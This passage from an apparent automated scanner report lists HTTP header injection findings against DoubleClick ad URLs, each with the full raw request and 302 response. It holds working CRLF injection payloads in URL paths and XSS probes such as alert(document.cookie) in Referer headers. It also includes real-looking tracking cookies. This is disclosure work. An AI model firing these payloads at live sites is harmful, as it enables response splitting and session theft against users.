GET /1fe5f%0d%0a152986ec65b/N5371.131643.MEEBO.COM/B5369958.2;sz=1x1;ord=4683596 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fe5f
152986ec65b
/N5371.131643.MEEBO.COM/B5369958.2;sz=1x1;ord=4683596:
Date: Tue, 10 May 2011 13:14:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/huffpost.boomerangpixel/bingmodule

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7aaba%0d%0a387e7ad2d0a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7aaba%0d%0a387e7ad2d0a/huffpost.boomerangpixel/bingmodule;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;u=1x1%7Cbpage%7Cboomerang%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7C%7C859012%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=1545223310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7aaba
387e7ad2d0a
/huffpost.boomerangpixel/bingmodule;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;so:
Date: Tue, 10 May 2011 13:20:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.doubleclick.net/ad/q1.philly/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/q1.philly/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 39ce7%0d%0a2f52260dc9e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /39ce7%0d%0a2f52260dc9e/q1.philly/news;net=q1;u=,q1-5225770_1305037198,11fda490648f83c,none,q1.polit_h-q1.none_l;;sz=728x90;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39ce7
2f52260dc9e
/q1.philly/news;net=q1;u=,q1-5225770_1305037198,11fda490648f83c,none,q1.polit_h-q1.none_l;;sz=728x90;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;ord=[timestamp]:
Date: Tue, 10 May 2011 14:22:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.CasaleMedia/B4461671.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6b9f3%0d%0a081c9994bcf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6b9f3%0d%0a081c9994bcf/N1558.CasaleMedia/B4461671.2;sz=300x250;click0=http://c.casalemedia.com/c/4/1/81668/;ord=0623409108 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?b707f%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E27da8a889a7=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b9f3
081c9994bcf
/N1558.CasaleMedia/B4461671.2;sz=300x250;click0=http: //c.casalemedia.com/c/4/1/81668/;ord=0623409108
Date: Tue, 10 May 2011 14:32:26 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.9. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a9ad%0d%0a035b77634f4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a9ad%0d%0a035b77634f4/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a9ad
035b77634f4
/N3285.casalemedia/B2343920.400;sz=728x90;click0=http: //c.casalemedia.com/c/2/1/80254/;ord=0619192936
Date: Tue, 10 May 2011 13:18:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.10. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4441.contextweb.com/B5238188.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 156a8%0d%0aaaaf12c76d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /156a8%0d%0aaaaf12c76d6/N4441.contextweb.com/B5238188.3;sz=300x250;pc=55430;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~530930~3102~55430~118002~90494~3~0~0~gather.com~2~8~1~0~2~4~-v4tGUlNnOKLF2eVmcuAJa88_QclyMTM~4~2~J27ODOzR145A~RiC6i2pCL3Ub~1~0~1~~;ord=1715081945? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/156a8
aaaf12c76d6
/N4441.contextweb.com/B5238188.3;sz=300x250;pc=55430;click=http: //cdslog.contextweb.com/CDSLogger/L.aspx
Date: Tue, 10 May 2011 14:12:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.11. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6344.126328.SPECIFICMEDIA/B5358490.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8bee1%0d%0ad42cbf71b63 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8bee1%0d%0ad42cbf71b63/N6344.126328.SPECIFICMEDIA/B5358490.6;sz=300x250;click=http://ads.specificmedia.com/click/v=5%3Bm=2%3Bl=25167%3Bc=151326%3Bb=898911%3Bp=ui%3DwJ6hSWn821G3dA%3Btr%3DwzKYu5Hfx_D%3Btm%3D0-0%3Bts=20110510134326%3Bdct=;ord=20110510134326? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=25167;c=151326;b=898911;ts=20110510134326;p=ui%3DwJ6hSWn821G3dA%3Btr%3DwzKYu5Hfx_D%3Btm%3D0-0;cxt=811200901:2278864-99003145:2268034-99008493:2265143-104201101:2278864-99011741:2267570-1012201040:2278864-99016158:2288221-1208201001:2290663-21012048:2290663
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8bee1
d42cbf71b63
/N6344.126328.SPECIFICMEDIA/B5358490.6;sz=300x250;click=http: //ads.specificmedia.com/click/v=5;m=2;l=25167;c=151326;b=898911;p=ui=wJ6hSWn821G3dA;tr=wzKYu5Hfx_D;tm=0-0;ts=20110510134326;dct=;ord=20110510134326
Date: Tue, 10 May 2011 17:46:21 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.12. http://ad.doubleclick.net/adi/N6543.131803.TURN.COM/B5513576.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6543.131803.TURN.COM/B5513576.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4c0ec%0d%0a3e7d65afa05 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4c0ec%0d%0a3e7d65afa05/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033?;click=http://r.turn.com/r/formclick/id/IQjKlh7ZRmyuUQYACAIBAA/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4c0ec
3e7d65afa05
/N6543.131803.TURN.COM/B5513576.10;sz=728x90;ord=7802162129868032033:
Date: Tue, 10 May 2011 14:00:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.13. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5bb6e%0d%0a487b017bf01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5bb6e%0d%0a487b017bf01/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2689;qcs=2687;qcs=2685;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=680;qcs=679;qcs=678;qcs=666;qcs=665;qcs=657;;plat=win;br=ch;bv=11;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;u=728x90%7Cbpage%7Cleaderboard_top%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7CD,T,2689,2687,2685,1908,1905,1592,683,680,679,678,666,665,657%7C859012%7C%7C%7C;sz=728x90;tile=1;ord=72222061? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5bb6e
487b017bf01
/huffpost.politics/news;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina:
Date: Tue, 10 May 2011 13:30:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.14. http://ad.doubleclick.net/adi/x1.rtb/casio/cttech [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/casio/cttech

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 149d2%0d%0a16e2e59be91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /149d2%0d%0a16e2e59be91/x1.rtb/casio/cttech;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHeQANXY0K2hnW4MUzgg==&_o=17694803&_eo=52786&_et=1305036666&_a=17764029&_s=44276902&_d=17767339&_pm=52786&_pn=17767350&redirect=;u=17767350;ord=1300754? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB7gqneUfJTY27Ndaz6AaC55SGDpyLwYICoN-GtBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBXmh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydCgxKSUzQy9zY3JpcHQlM0U3ODYxZDk1OGE1NS-YAoIGwAIEyAL264oOqAMB6APdBegDpgPoA5sE9QMCAADEgAaI9ZrRq8yS2vkB%26num%3D1%26sig%3DAGiWqtw7c8Tc5DaxrY1WfTDVIyVygQSXPQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHeQANXY0K2hnW4MUzgkvhkmlLmS-_BY7o8A&_nv=1&_CDbg=17764029&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAL0ODwEAAAAAqxsPAQAAAAC2Gw8BAAAAAL8bDwEAAAAAwBsPAQAAAAAy-txBAAAAAAAA-D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSGVRQU5YWTBLMmhuVzRNVXpnZz09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAAAAAAAAAAAA8AAAAAAAAAMTczLjE5My4yMTQuMjQzBgAAAAAAAAA3Mjh4OTAhAAAAAAAAADEwNjNiYmUwOTllYTY0OGMuYW5vbnltb3VzLmdvb2dsZQwAAAAAAAAAXl4xNzU2MTI5MjgyAwAAAAAAAAA3MzMGAAAAOwAAAAAAAAAAAAAAAAAAAAB6R8lNAAAAAA==
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/149d2
16e2e59be91
/x1.rtb/casio/cttech;sz=728x90;click=http: //bn.xp1.ru4.com/bclick
Date: Tue, 10 May 2011 14:24:26 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.15. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/doubledma/ron/ctest

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8d6d5%0d%0a7af32fd48fa was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8d6d5%0d%0a7af32fd48fa/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=TclHyQALCE4K2hvK36QcGA==&_o=15607&_eo=52786&_et=1305036746&_a=1791737&_s=44276902&_d=1125798&_pm=52786&_pn=17918657&redirect=;u=17918657;ord=1861503? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuiJLyUfJTc6QLMq36AaYuJD9DZyLwYICzq352RH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi01MjIwOTYwNDk1MTIyMzc1oAH04JnsA7IBDHd3dy5nZWVrLmNvbboBCTcyOHg5MF9hc8gBCdoBbGh0dHA6Ly93d3cuZ2Vlay5jb20vYXJ0aWNsZXMvZ2Vlay1waWNrLzYzMzk4LS0lM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRTc4NjFkOTU4YTU1L5gC7gXAAgTIAvbrig6oAwHoA90F6AOmA_UDAgAAxIAG5qKevvn1pN9U%26num%3D1%26sig%3DAGiWqtzE70M5ZVPZNUy9dig2lfZ1QJdjuQ%26client%3Dca-pub-5220960495122375%26adurl%3D&_wp=TclHyQALCE4K2hvK36QcGKsDJ2HTxV_xoZb9UQ&_nv=1&_CDbg=1791737&_eo=52786&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAPlWGwAAAAAApi0RAAAAAADBahEBAAAAANQwEQAAAAAA1TARAAAAAAAy-txBAAAAAAAA9D8AAAAAAAAAADLOAAAAAAAAppyjAgAAAAAyzgAAAAAAABgAAAAAAAAAVGNsSHlRQUxDRTRLMmh2SzM2UWNHQT09GwAAAAAAAABDQUVTRUs2TmNPZ1gwaF9RUUpFNXFZZ2dtYTAUAAAAAAAAAEFBLTAwMDAwMDAxOTMxNzA4NDI3DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MCEAAAAAAAAAMTA2M2JiZTA5OWVhNjQ4Yy5hbm9ueW1vdXMuZ29vZ2xlDAAAAAAAAABeXjE3OTgwOTk5NzIDAAAAAAAAADczMwYAAAA7AAAAAAAAAAAAAAAAAAAAAMpHyU0AAAAA
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8d6d5
7af32fd48fa
/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http: //bn.xp1.ru4.com/bclick
Date: Tue, 10 May 2011 14:24:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.16. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 35660%0d%0ae53d0cda688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /35660%0d%0ae53d0cda688/N3175.128132.INTERCLICK/B4640114.13;sz=728x90;click=http://a1.interclick.com/icaid/128532/tid/f7860f8c-0b93-4b41-8149-a2cc91d07361/click.ic?;ord=634406189604069363? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://media.contextweb.com/creatives/BackupTags/530930/82ee614d-b189-4b28-8d83-df850b76e9fbAdKarma_728x90..html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/35660
e53d0cda688
/N3175.128132.INTERCLICK/B4640114.13;sz=728x90;click=http: //a1.interclick.com/icaid/128532/tid/f7860f8c-0b93-4b41-8149-a2cc91d07361/click.ic
Date: Tue, 10 May 2011 14:11:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.17. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2043e%0d%0af14956544cf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2043e%0d%0af14956544cf/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000801877/mnum=0000884206/cstr=1219384=_4dc949b1,2440706181,801877%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=1219384/optn=64?trg=;ord=2440706181? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2043e
f14956544cf
